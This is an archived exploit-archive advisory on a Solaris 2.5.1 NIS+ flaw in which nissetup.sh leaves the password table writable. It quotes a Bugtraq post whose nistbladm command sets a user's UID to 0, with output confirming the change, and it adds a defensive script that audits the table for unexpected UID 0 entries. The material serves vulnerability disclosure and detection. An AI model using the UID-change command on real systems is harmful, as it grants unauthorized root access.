Insecure Solaris default nissetup password table permissions!

Summary
Description: The nissetup.sh program for setting up NIS+ databases leaves insecure permissions on the password table. This allows you to, for example, use nistbladm to change your UID!
Author: Well known
Compromise: root (local)
Vulnerable Systems: Unpatched Solaris 2.5.1 systems (possibly earlier versions of Solaris).
Date: 10 February 1996
Notes: Here is an anonymous posting reminding us of the problem. Also, Casper Dik (casper@HOLLAND.SUN.COM) mentioned that just installing the Solaris patch doesn't fix the problem. You need to manually reset the bad permissions. How many people do you think forgot to do that?
Details


Date: Fri, 30 May 1997 19:44:40 +0200
From: Anonymous <nobody@REPLAY.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: NIS+, Solaris 2.5.1

Ever tried to change your NIS+ password with
the "nistbladm" command? Works fine, but you
can also change your UID ....

$ nistbladm -e uid=0 '[name=alice]',passwd.org_dir

$ niscat passwd.org_dir | grep alice
alice:xedvtAgfruijg:0:1001:........
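
A detection-side check for the outcome shown in the post, added here as an example (it is not part of the original posting): it reads lines in the `niscat passwd.org_dir` output format and reports any entry with UID 0 that is not on an allowlist and, going beyond the UID 0 case, any UID shared by two names. The function names, the ALLOWED_UID0 variable and the sample table are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: audit passwd-table lines (name:passwd:uid:gid:...) for
# UID values that a user could have set on their own entry.
# Typical use on a NIS+ client:  niscat passwd.org_dir | audit_uid0

# Assumption: space-separated names that are allowed to hold UID 0.
ALLOWED_UID0="${ALLOWED_UID0:-root}"

audit_uid0() {
    awk -F: -v allow="$ALLOWED_UID0" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        /^[ \t]*$/ { next }                      # skip blank lines
        NF < 4 || $3 !~ /^[0-9]+$/ {             # too few fields or non-numeric UID
            print "MALFORMED:" NR; rc = 1; next
        }
        {
            uid = $3 + 0                         # numeric, so "00" is also UID 0
            if (uid == 0 && !($1 in ok)) { print "UID0:" $1; rc = 1 }
            if ((uid in owner) && owner[uid] != $1) {
                print "DUPUID:" uid ":" owner[uid] "," $1; rc = 1
            } else {
                owner[uid] = $1
            }
        }
        END { exit rc + 0 }                      # non-zero when anything was flagged
    '
}

# Constructed sample table (not real data); HASH stands in for the passwd field.
sample_table() {
    cat <<'EOF'
root:HASH:0:1:Super-User:/:/sbin/sh:
alice:HASH:0:1001:Alice:/home/alice:/bin/sh:
bob:HASH:1002:1001:Bob:/home/bob:/bin/sh:
carol:HASH:1002:1001:Carol:/home/carol:/bin/sh:
EOF
}

sample_table | audit_uid0 || echo "review the flagged entries above"
```

Run against a saved copy of the table after resetting the permissions as well, since entries changed before the reset stay changed.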


This page is part of Fyodor's exploit world.